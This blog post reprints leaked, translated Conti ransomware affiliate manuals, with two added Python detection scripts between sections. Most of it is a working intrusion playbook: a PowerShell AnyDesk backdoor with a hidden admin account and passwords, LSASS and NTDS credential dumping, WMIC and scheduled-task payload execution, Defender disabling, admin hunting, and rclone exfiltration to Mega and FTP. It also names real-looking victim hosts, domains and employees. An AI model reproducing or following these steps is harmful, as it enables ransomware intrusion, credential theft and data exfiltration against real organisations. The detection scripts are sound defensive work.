A look at Conti's "kung fu"

A few days ago a "disgruntled" affiliate of Conti, one of the most active RaaS (Ransomware-as-a-Service) gangs of recent times, leaked the gang's data on the XSS forum.

Worth highlighting is the file "Мануали для работяг и софт.rar", which translates to something like "Manuals for hard workers and software.rar".
This archive contains 41 text files with instructions on how to use various hacking tools, and even legitimate software, during an intrusion. Without doubt a great opportunity to discover how this type of actor works, and thanks to Darkfeed we can find them translated into English:

Tools:

  • Rclone
  • ZeroLogon exploit
  • AnyDesk for exfiltration
  • RouterScan
  • Ngrok
  • Cobalt Strike
  • Kerberoasting Attacks
  • Metasploit
  • Proxifier

Scripts And Manuals:

  • Disable Av’s Scripts
  • Disable Windows Defender protections
  • Delete shadow copies
  • Active Directories Dumping
  • Privilege Escalation
  • Hacking into Domain Controllers
  • Installing Metasploit on VPS
  • Metasploit commands and use
  • How To Stay Anonymous
  • How to know what info to download from a victim network
  • How to jump sessions using a payload
  • How to make sort of collected data

Files:

File Name: ad_users.txt

I’ll tell you another moment about ad_users, there is a lot of information about employees, there you can find techies, engineers, etc. We usually need ad_users when
we want to find the admin’s wheelbarrow, because on the admin’s wheelbarrows we can find flogs from the antivirus console,
from cloud backups, etc. Now I will throw off the manual for YUZERHUNTER, with the help of it, we find these cars. We also need ad_users
to get the SID from there for a golden ticket, but more on that later
1. make a list of targets
1.1 We open ad_users, we are looking for who we are potentially interested in: admin / engineer / inform technologists / IT
take account logins from sAMAccountName
1.2 We take a list of domain admins
1.3 put the first and second in the list.txt file

2. Load power view.
2.1 powershell-import /home/user/soft/powerview/view.ps1
2.1 – comment: importing power view from /home/user/soft/powerview/view.ps1

2.3 Cutting in hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt

instead of 1884 – the PID of the process where we have enough rights to make an injection.
x64 – or x86 bit of the process. see in the tasklist
In C:\ProgramData\list.txt there should be the list that we made in point #1.
In 5-10-20 minutes look at the result in out.txt. As soon as it finishes it fills the file in one go; that is, if the file is 0 bytes, it means that it is still working or the AV has burned it (if it has been burned, you will see it in the koba)

File Name: AnyDesk fix.txt

AnyDesk fix – familiarize everyone
Function AnyDesk {

mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)

cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent

cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password

net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

}

AnyDesk

Executing the code in Powershell ISE Run As Admin
At the output, we get ID
We keep it to ourselves
Download Anydesk on a separate Dedicated Server \ VPS \ Virtual Machine and specify the ID
Click Console Account
Enter your password

J9kzQ2Y0qO

And then we log in as a local admin or domain account and use the charms of Anydesk
You can also download / upload to / from the victim’s machine, which is convenient in scanning and searching for documentation pointwise.

File Name: Changing the RDP port.txt

# add firewall rules
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
# add to registry new port
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350
# powershell
Restart-Service termservice -force

RDP port
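What the AnyDesk file and the RDP-port file above leave on a host is easy to see from the defender's side: a local account created (Security event 4720), added to Administrators (4732) and hidden from the logon screen through the Winlogon SpecialAccounts\UserList value, and the RDP listener moved off 3389 through the RDP-Tcp\PortNumber value. The following Python script is an added example, not code from the leak or from this post, that correlates those signals; it assumes events have already been normalised into dicts with the Security and Sysmon field names used below, and the sample records are constructed.

```python
# Added example (not from the leaked manuals or the blog post): flag the two
# host changes described above from Windows telemetry. Assumed input format:
# each event is a dict with the named fields of Security events 4720 / 4732
# and Sysmon event 13 (registry value set); the records below are constructed.
import re

# Registry values the two manuals touch. Sysmon reports the value path as
# TargetObject and a DWORD as "DWORD (0x00000000)" in Details (assumed format).
HIDE_ACCOUNT_KEY = re.compile(
    r"\\Winlogon\\SpecialAccounts\\UserList\\(?P<user>[^\\]+)$", re.I)
RDP_PORT_KEY = re.compile(
    r"\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber$", re.I)
DWORD_VALUE = re.compile(r"0x([0-9A-Fa-f]+)")


def dword(details):
    """Extract the integer from a Sysmon 'DWORD (0x...)' Details string."""
    m = DWORD_VALUE.search(details)
    return int(m.group(1), 16) if m else None


def analyse(events):
    """Return a list of (rule, description) findings for a batch of events."""
    created, local_admins, hidden, findings = set(), set(), set(), []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4720:  # Security: a user account was created
            created.add(ev["TargetUserName"].lower())
        elif eid == 4732 and ev["TargetUserName"].lower() == "administrators":
            # Security: member added to a local group; MemberName is DOMAIN\user
            local_admins.add(ev["MemberName"].split("\\")[-1].lower())
        elif eid == 13:  # Sysmon: registry value set
            key = ev["TargetObject"]
            m = HIDE_ACCOUNT_KEY.search(key)
            if m and dword(ev["Details"]) == 0:
                # UserList\<name> = 0 hides the account from the logon screen
                hidden.add(m.group("user").lower())
            elif RDP_PORT_KEY.search(key):
                port = dword(ev["Details"])
                if port not in (None, 3389):
                    findings.append(("rdp_port_changed",
                                     f"{ev['Image']} set RDP-Tcp PortNumber to {port}"))
    for user in sorted(created & local_admins):
        if user in hidden:
            findings.append(("hidden_local_admin",
                             f"new account {user} added to Administrators and hidden from the logon screen"))
        else:
            findings.append(("new_local_admin",
                             f"new account {user} added to Administrators"))
    return findings


# Constructed sample: the sequence the AnyDesk script and the RDP file produce,
# plus one unrelated registry write. Host and image names are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "oldadministrator"},
    {"EventID": 4732, "TargetUserName": "Administrators",
     "MemberName": "WIN-EXAMPLE\\oldadministrator"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
                     "\\SpecialAccounts\\UserList\\oldadministrator",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server"
                     "\\WinStations\\RDP-Tcp\\PortNumber",
     "Details": "DWORD (0x00000546)"},   # 0x546 = 1350
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "C:\\Program Files\\Example\\updater.exe"},
]

if __name__ == "__main__":
    for rule, text in analyse(SAMPLE_EVENTS):
        print(f"[{rule}] {text}")
```

The three account events are correlated rather than alerted on individually because a new local administrator on its own is routine on many networks; the UserList value set to 0 is what turns it into the pattern of this script.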

File Name: DAMP NTDS.txt

Low-profile NTDS dump method
shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"


we make a request for listing shadow copies, there is an indication of the date, check that there is a fresh date
almost certainly they are already there, if not, then we do it ourselves

net start Volume Shadow Copy
shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"


further in the listing of shadow copies we find the freshest
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55
accordingly, we need a copy number for the next command


shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\"

the files ntds.dit / security / system should land in c:\temp\log\
take a portable console 7z and pack it into an archive with a password

7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD


we download the password-protected archive for ourselves, if we get an error when decrypting the ntds file (the file is damaged), then we do the following


esentutl /p C:\log\ntds.dit


the trick of this method is that in fact we don’t dump anything, we just take and pump out ntds
in order not to get burned by the fact that we are pulling out exactly ntds, we pack it into a password-protected archive

if you have troubles with something that is fired and thrown out of the network after an NTDS dump – try this method
it can only be burned by the very fact of some leaking date from the CD, and it is impossible to analyze what exactly you are dragging without knowing the password from the archive

File Name: DISABLING THE DEFENDER MANUALLY.txt

gpedit.msc
Inside, go along the path Computer Configuration – Administrative Templates – Windows Components – Windows Defender
we find the item “Protection in real time”:
There we select the item “Disable real-time protection” and click into it twice with the mouse button:
Then select the “Enabled” circle and click OK.

we always run everything from the Administrator:
uac – removes the pop-up window asking for permission to run from the admin
defoff – kill defender (does not work for everything, we check afterwards for the presence of the MsMpEng process in taskmgr)
RDP – brings up port 3389
del – delete Shadow copy (asks for permission to delete, press – y)
NS – mount hidden system drives (pass: 98) !! use after the AV has been removed

NLA + BACK – fixes NLA + backdoor for login without password, works like this:
in the login window (where it asks to enter credits) – press win + Y the cmd window pops up
write taskmgr, open the users tab, right-click for any user – a connection
p.s – does not work on Windows 10 \ requires a password


ARCHIVE DISCONNECTING VARIOUS AUTPASSES: 9SealG

File Name: domains.txt

CLeichty
sd-cernst-vista
SDBUILD11
sd-books-01
sdt-xp-04
DEV-SPARE
MININT-N3JOUQL
SDBUILD10
sdmmarshall02
gary-x60
laptop07
gary-x61
cernstdesktop
pkomosin01
MININT-50C2BP7
DESKTOP-PC
SGRAY-PC
MattHLaptop
MattLauth-PC
jimbendt
laptop05
sdbuild13
nholli-laptop01
rthomp01
sdlaptop02
SDT-Vista-01
SDBuild19
GHARPST-LAPTOP
sdt-xp-01
dedds01
sdt-xp-02
SDT-WIN7X64-01
DKECK-OUTLOOK
vern-laptop
GHARPST01
mheidepriem
CWETHERILL2
PKOMOSINSKI01
GHARPST-X200
six-d9db82df276
jridge01
banderson02
SDT-Win8x64-01
SDT-XP-03
SD-EMailVerifier-01
russ-PC
bclark03
SDD-Win8x64-01
GMHII
casey-PC
GH-SURFACE
mheidepriem01
DKECK-WIN7
SDT-Win81x64-01
jbendt-01
dkeck-VM
sdt-vista-02
sdt-xp-05
VERN-THINK
SDT-WIN7X86-02
perload02
MLAUTH01
cernst-desktop
XPS
cernst01
PHARTMAN01
CASEY-D810
SGRAY-PC1
DellLatD830
mheidepriemDesk
DLOCKET01
dlockert
AutomatedTest
COREYL-DESKTOP
d410loaner
DKECK-DESKTOP
GH11
WIN-DSICSJFMGTJ
WIN-9CH5144SG63
NStrong
BLARK-E5530
CASEY-ASUS
Casey-Desktop
SDT-Win10x64-01
CWETHERILL
DESKTOP-T6363GF
GH-PC
MHeidepriem03
MHEIDEPRIEM02
SDT-Win10x64-02
SDBUILD-01
SDT-Win8x86-01
SDBUILD-02
SS-SLATE
Gary-Yoga
SDT-WIN7X86-01
BSI-PWD-01
LOANER
Wetherill
SurfacePro3
DESKTOP-K66L1AA
SDS-NKOMOSINSKI
blortied420
casey-laptop
Wetherill-Acer
SDBUILD-LAP1
davids-macbook
SDBUILD14
lenovocarbon
VSTRONG-LENOVO
SD-VERN-01
CaseyAcer
casey-dev
DKECK-WORK
dkeck-dev
6D-JHARPST-02
Cory-Asus
SIXD-TMACKE-L1
rmortensen1
6d-jharpst-01
CoreyL-Laptop
rmortensen
CoreyL-Dev

File Name: DUMP LSASS.txt

LSASS:
method via coba: (*** special thanks to @Sven)
1) getsystem
2) shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (we specify the pid of lsass)
(on a remote wheelbarrow) coba_wmic:
shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
=======
method via RDP:
open taskmgr => right-click on the lsass process => create dump file. \\ Next, download the file to your computer,

=======
how to unshack:
open the facial expression and further:
privilege::debug
sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP (replace with the path to our file)
log
sekurlsa::logonpasswords

File Name: ENVIRONMENT OF PRIVILEGES.txt

a stack of manuals on elevation of rights, who does not know English well, we translate here —> deepl.com

github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet

File Name: Gaining access to the server with Shadow Protect SPX (StorageCraft) backups.txt

Gaining access to the server with Shadow Protect SPX (StorageCraft) backups
==
1. We go via RDP to one of the servers, in my case it is a SQL server.
2. on the desktop we see the icon of the ShadowProtect SPX software
-> click on it
3. the GUI opens (if it asks for credits, we enter those under which we entered via RDP, or any other DA)
4. On the left in the “Job Summary” block we see a detailed description of the backup scheme
in the “Name” field – the name of the backup of our server
in the field “Destination” – the place WHERE our spx adds backups, in the form NAME_BA_SERVAK (SHARA WITH BACKUP ON THIS SERVAK)
from our example, we can conclude that all backups are saved in a share named StorageCraft, and the folders with server backups are named with the name of the server itself.
5. Knowing the name of the backup server, we want to get a better idea of its structure; first of all we get the shares with the command "cmd.exe > net view \\COH-DSS3 /ALL", in response we get "Error 5: Access Denied"
6. There is no access, we try to knock with other DA accounts – the answer is the same – error no 5; it would be logical to assume that in order to gain access to the server we need either the credits of the local administrator on this very server, or a special user account with dedicated rights
7.Suppose that if this is a dedicated user, then he has a name similar to the soft \ function:
we iterate over the logins with the occurrence of substrings (here we need to turn on imagination):
Storage
Shadow
Protect
Craft
SP
SPX
Backup
BUUser
ETC.
after which we do a search on ntds.dit (hashes.txt.ntds) to find a hash, in my case the search was successful and I found the user Humanity.local \ SPAdmin (I think it is clear here that this is Shadow Protect Admin) and his hash ce31b806821bec116ba03132ab5b3138, BUT unfortunately the search on cmd5.org did not give any result, and I desperately need a clearpass. (If you have enough hash, then congratulations – you have achieved the result)
8. But if you still need a clear pass or you could not find a suitable user, we will understand that if the software somehow knocks on the server, then the credits are known to it, which means they could remain on the server.
Trying to dump hashes
I will not describe in detail how to do this, but you should try hashdump (and its legitimate counterparts) and logonpasswords (and analogs)
In my case, I used a facial expression and dumped lsass, in which I found a clear pass from my SPAdmin account – kerberos:
* Username: SPAdmin
* Domain: COHBackup
* Password: Backup! User
(in my case, for some reason, the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace with your value))
9. Go to the explorer, and open through it the necessary share "\\COH-DSS3\StorageCraft"; it asks me for credits, I enter COHBackup\SPAdmin and Backup!User and successfully get access
10. Also, in some grids, there may be several backup servers, as an option to check this, this is to click on the Backup button in the upper left corner of the goo (right after File) then – Destinations -> and see what paths there are for saving backups
===

File Name: HOW AND WHAT INFU TO DOWNLOAD.txt

1) After we raised the rights, found the Admin Domain, we pull the sessions into cobalt
2) We put on the DA token and pull the shares like this:
* powershell-import – upload ShareFinder there as usual and give the following command –
psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt

Next, we study the extracted shares, we are interested in
* Finance docks
* Accounting
* Aichi
* Clients
* Projects
And so on, it all depends on what our target is doing.

Next, we do the following> here is the Manual from Diablo, all lego is accessible and understandable
after that we enter the mail address mega after he asks for his pass to enter or generate we choose our letter ‘Y’
the pass will not appear when inserted, however it is inserted there anyway
after creating the config, we are thrown into the main menu and we exit the clone.
then we enter this command rclone.exe config show it will show the config itself that we created
we copy it and create the rclone.conf file where we put this info.
after we have found the shares we are interested in, we load the exe and the config onto the target machine with the rights, we hide the config and the executable so that they are not found
go to the executable directory and give the command: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
where: \\envisionpharma.com\IT\KLSHARE is the share
Mega:Finanse is the location of the files in Mega (you can create a folder in Mega yourself, you just need to specify it here)
--multi-thread-streams 12 --transfers 12 is the number of streams; pumping at the maximum (12) I do not recommend, as you can easily get burned


shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 – here is an example, in this case to FTP

!!! RKLON ITSELF WEIGHT OF THE ORDER 50MB, THE LINK TO IT WILL BE BELOW THE POST !!!

File Name: HOW TO DO PING (NETWORK).txt


++++++++++++++++++++++ HOW TO DO PING +++++++++++++++++++
1. CREATE A TXT FILE ON THE DESKTOP WITH THE NAME domains.txt
2. YOU HAVE A SORT OR JUST LOCAL NAMES OF COMPUTERS WE COLLECT THEM INTO THIS FILE
3. UPLOAD THE FILES domains.txt AND p.bat ONTO THE MACHINE (C:\ProgramData\) FROM WHICH THE PING WILL BE DONE
4. STARTING p.bat USING THE shell COMMAND
5. AFTER PING DOWNLOAD THE FILE res.txt

———————————– HOW QUICKLY TO GET A CLEAN SPEED FROM RUNNING MACHINES —– —————————–
1. YOU HAVE THE FILE res.txt, OPEN IT IN NOTEPAD++
2. PRESS CTRL + F, IN THE SEARCH LINE ENTER TTL
3. CLICK FIND ALL IN CURRENT DOCUMENT, A WINDOW WITH THE LIST WILL APPEAR
4. WE GO TO THE SITE en.toolpage.org/tool/ipv4-extractor, PASTE EVERYTHING THAT CAME OUT THERE AND GET CLEAN IPs


SITE FOR BRUTE OF SIMPLE HASHES

———–> hashes.com
========================

File Name: HOW TO JUMP SESSIONS USING A PAYLOAD.txt

Commands for starting the peloid to pull up the session to cobalt
1) shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
2) shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15"
3) shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F
instead of
MS040926754153
insert
the IP of the machine
take turns pounding the commands
1) creating a task with a payload
2) cutting
3) deletion

We use it more often when launching via WMI
1) if it is a DLL, then
shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW"

Accordingly, where is the ip, we insert the ip of the machine to which we have access, then the path and name of our dll goes, I think the syntax is clear

If you are on RDP > open CMD as administrator and rundll32.exe C:\ProgramData\x64.dll, StartW; you can specify any path according to where your dll is located


For EXE or .bat format, launch via WMI like this

shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"

 

You can also download and run through the metasploit, but now we rarely use launch and load using this tool, since it does not work correctly in the latest version
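Every command in the NTDS, LSASS, rclone and scheduled-task files above is a distinct process-creation record on the host that runs it, and the NTDS file itself admits that the only trace of that method is the shadow copy plus a file copy. The script below is an added example (not from the leak or from this post) of a small rule set over process telemetry plus a per-host correlation for that pair. It assumes events as dicts with Host and CommandLine (the fields Sysmon event 1 or Security 4688 provide), and the sample command lines are constructed from the shapes quoted above with placeholder hosts and redacted credentials.

```python
# Added example (not from the leaked manuals or the blog post): a small rule set
# for process-creation telemetry covering the credential-theft, shadow-copy,
# remote-execution and exfiltration command lines quoted in the NTDS, LSASS,
# rclone and "jump sessions" files above. Input is assumed to be a list of
# dicts with "Host" and "CommandLine" (as Sysmon event 1 / Security 4688 would
# give you); the sample records are constructed, with placeholder host names.
import re


def normalise(cmd):
    """Collapse whitespace and lower-case so rules match regardless of layout."""
    return re.sub(r"\s+", " ", cmd).strip().lower()


# Each rule is (name, compiled pattern applied to the normalised command line).
RULES = [
    ("lsass_minidump_comsvcs",
     re.compile(r"comsvcs\.dll\s*,?\s*minidump\b")),
    ("shadow_copy_created",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate shadow\b")),
    ("ntds_copied_from_shadow",
     re.compile(r"harddiskvolumeshadowcopy\d+\\windows\\ntds\\ntds\.dit")),
    ("ntds_repair_esentutl",
     re.compile(r"\besentutl(\.exe)?\b.* /p .*ntds\.dit")),
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(\.exe)?\b.*/node:.*process call create")),
    ("schtasks_epoch_start_date",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*/sd 01/01/1970")),
    ("rclone_to_remote",
     re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b.* (mega|ftp\w*|s3|drive)\w*:")),
]


def scan(process_events):
    """Return [(rule, host, original command line)] for every rule that fires."""
    hits = []
    for ev in process_events:
        cmd = normalise(ev["CommandLine"])
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, ev["Host"], ev["CommandLine"]))
    return hits


def correlate(hits):
    """Hosts where a shadow copy was created and ntds.dit was then copied out.

    The NTDS file stresses that nothing is "dumped": no credential tool runs on
    the DC, only a shadow copy and a file copy, so the pair is the signal."""
    per_host = {}
    for name, host, _ in hits:
        per_host.setdefault(host, set()).add(name)
    wanted = {"shadow_copy_created", "ntds_copied_from_shadow"}
    return sorted(h for h, names in per_host.items() if wanted <= names)


# Constructed sample telemetry. Credentials and host names are placeholders;
# the wmic line is recorded on the beacon host, its child process on the DC.
SAMPLE_EVENTS = [
    {"Host": "ws01", "CommandLine":
     "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 624 C:\\ProgramData\\lsass.dmp full"},
    {"Host": "ws01", "CommandLine":
     "wmic /node:\"DC01\" /user:\"DOMAIN\\admin\" /password:\"<redacted>\" process call create "
     "\"cmd /c vssadmin create shadow /for=C: 2>&1\""},
    {"Host": "dc01", "CommandLine": "cmd /c vssadmin create shadow /for=C: 2>&1"},
    {"Host": "dc01", "CommandLine":
     "cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy55\\Windows\\NTDS\\NTDS.dit c:\\temp\\log\\"},
    {"Host": "dc01", "CommandLine": "esentutl /p C:\\temp\\log\\ntds.dit"},
    {"Host": "ws01", "CommandLine":
     "schtasks /s HOST01 /RU \"SYSTEM\" /create /tn \"WindowsSensor15\" "
     "/tr \"cmd.exe /c C:\\ProgramData\\P32.exe\" /sc ONCE /sd 01/01/1970 /st 00:00"},
    {"Host": "ws01", "CommandLine":
     "rclone.exe copy \"\\\\fileserver\\IT\\share\" mega:exfil -q --transfers 12"},
    {"Host": "ws02", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"Host": "dc01", "CommandLine": "vssadmin list shadows"},
]

if __name__ == "__main__":
    for rule, host, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}: [{rule}] {cmd}")
    print("shadow-copy NTDS theft suspected on:", correlate(scan(SAMPLE_EVENTS)))
```

Note that `vssadmin list shadows` alone fires nothing: listing shadow copies is what backup software does all day, so the rule keys on `create shadow` and on the copy out of a `HarddiskVolumeShadowCopy` path, and `correlate` only reports a host where both were seen.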

File Name: HOW TO MAKE SORT OF COLLECTED HELL !!!!.txt

How to sort the collected AD data from the network
1) Download FileZilla


2) Download Putty, run Putty through Tor

Let’s go here torproject.org/download/tor/

Download ATTENTION Expert Bundle

Unzip, go to the Tor directory and run tor.exe

In a few seconds it will reach 100% Done

In the Putty settings, go to the proxy, set SOCKS5, ip 127.0.0.1 port 9050

3) We go through the filezilla to the server> go to the “Script” directory – put the AD files next to the script

4) Go to Putty, go to the server, go to the directory where the script is located, give the command
./script.sh

5) Done, go back to FilleZilla and pick up our sorted. After yourself, be sure to delete the AD files and the sorted folder, if the sorted folder is not deleted, just change it to any name

File Name: Hunting admins, please read, very useful !!.txt

Hunting the admin.

And so, if we have servers \ USS \ tapes or cloud storages where backups are stored, but there is no access, then we need credits that only the admin has.
Accordingly, we need to hunt him. Usually in those networks where we work admins 1-2-3, no more.
People are divided into 3 types of positions:

Senior
Medium
Junior

Of course, we are interested in seniors, since they have more privileges / accesses (read passwords).


To begin with, I will write several options for how to determine the accounts of those very administrators who have passwords on board.

Part 1::
Option number 1:
Interrogating the DA

```

beacon> shell net group “domain admins” /domain

Tasked beacon to run: net group “domain admins” /domain
host called home, sent: 64 bytes
received output:


La demande sera traitée sur contrôleur de domaine du domaine DOMAIN.com.

Nom de groupe Domain Admins
Commentaire Designated administrators of the domain

Membres

——————————————————————————-
Administrator ClusterSvc createch
Createch2 d01adm da9adm
p01adm PMPUser q01adm
repl s01adm Sapserviced01
SAPServiceDA9 sapservicep01 SAPServiceQ01
sapservices01 SAPServiceSND SAPServiceSOL
services services2 sndadm
soladm somadm staseb
telnet Johnadm
La commande s’est terminée correctement.

```

We look and see with our eyes filtering service accounts and non-service ones.
Service from the list above is for example
```
SAPServiceDA9
services
telnet
services2
Sapservice01
```

Which accounts will most likely suit us:
```
staseb
Johnadm
```
They were recorded.

We can see who they are in adfind_persons.txt

or through the command
```
shell net user staseb /domain
```

See example:
```

beacon> shell net user ebernardo /domain

Tasked beacon to run: net user ebernardo /domain
host called home, sent: 57 bytes
received output:


User name ebernardo
Full Name Eric Bernardo
Comment
User’s comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2020-12-08 12:05:15 PM
Password expires 2021-06-06 12:05:15 PM
Password changeable 2020-12-08 12:05:15 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2021-01-29 2:25:24 PM

Logon hours allowed All

Local Group Memberships *Administrators *Remote Desktop Users
*Server Operators
Global Group memberships *US Users *Great Plains Users
*Citrix Group *VPN Users Saskatoon
*Admins – AD Basic *VPNUsersHeadOffice
*Executives *All Winnipeg Staff
*Scribe Console Users *Domain Admins
*VPN Users USA *Workstation.admins
*Domain Users
The command completed successfully.

```

We look at who he is – he is in a dozen groups, SOMETIMES in the Comment column they write who he is – engineer \ system administrator \ support \ business consultant.
in Last Logon, the account must be ACTIVE – that is, last logon today \ yesterday \ this week, but not a year ago or Never.
If it is not clear who this is after the survey, see adfind + check linkedin (section below).

So as a result you get 2-3-5 accounts out of the domain admins; you question each one and should have an idea of who he is. As a result of 1-2-3 accounts, it turns out to be possible to find who could be an administrator.

Option number 2:
Turning into home analysts – watching Adfind.
We are interested in the adfind_groups file
We go in, we see a bunch of text
Press Ctrl + F (Notepad2 / Geany)
Introduce
```
dn:CN=
```
And the button Find All in current document.

at the output we get ABOUT the following (I cut out a piece and left 10-20 lines, usually there are from 100 to 10,000 lines)
```

adfind_groups:3752: dn:CN=SQLServer2005SQLBrowserUser$TRUCAMTLDC,CN=Users,DC=domain,DC=com
adfind_groups:3775: dn:CN=clubsocial,CN=Users,DC=domain,DC=com
adfind_groups:3800: dn:CN=Signature Intl-Special,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:3829: dn:CN=FIMSyncAdmins,CN=Users,DC=domain,DC=com
adfind_groups:3852: dn:CN=GRP-GRAPHISTE,OU=FG-GRP,DC=domain,DC=com
adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com
adfind_groups:3902: dn:CN=MSOL_AD_Sync_RichCoexistence,CN=Users,DC=domain,DC=com
adfind_groups:3925: dn:CN=WinRMRemoteWMIUsers__,CN=Users,DC=domain,DC=com
adfind_groups:3946: dn:CN=EDI,CN=Users,DC=domain,DC=com
adfind_groups:3967: dn:CN=Signature Canada,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:4037: dn:CN=Signature USA,OU=Groupes,OU=Infra,DC=domain,DC=com

```
And so, we have extracted the active directory groups.
What is interesting for us here and why we did it – in Active Directory everything is structured, and in USA/EU networks everything is done as transparently as possible with comments, notes, copycards, etc.
We are interested in a group that deals with IT, administration, LAN engineering.
What was given to us after the search – we put it in a new notebook and do a search for the following key words:
```
IT
Admin
engineer
-----
```

In the example above, we find the following line
```
adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com
```

Go to line 3877 in adfind_Groups.txt and see the following:
```

dn:CN=IT,CN=Users,DC=domain,DC=com
>objectClass: top
>objectClass: group
>cn: IT
>description: Informatique
>member: CN=MS Surface,OU=IT,DC=domain,DC=com
>member: CN=Gyslain Petit,OU=IT,DC=domain,DC=com
>member: CN=ftp,CN=Users,DC=domain,DC=com
>member: CN=St-Amand\, Sebastien\, CDT,OU=IT,DC=domain,DC=com
```
We skip ftp and MS Surface users, but we take Gyslain Petit and St Amand Sebastien into circulation.
Next, open ad_users.txt
Introducing Gyslain Petit
We find a user with the following information:
```
dn:CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Gyslain Petit
>sn: Petit
>title: Directeur, technologie de l’information
>physicalDeliveryOfficeName: 217
>givenName: Gyslain
>distinguishedName: CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>instanceType: 4
>whenCreated: 20020323153742.0Z
>whenChanged: 20201212071143.0Z
>displayName: Gyslain Petit
>uSNCreated: 29943
>memberOf: CN=GRP_Public_USA_P,OU=Securite-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-LDAP-VPN,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=IT Support,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=Directeurs,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-IT,OU=FG-GRP,DC=trudeaucorp,DC=com
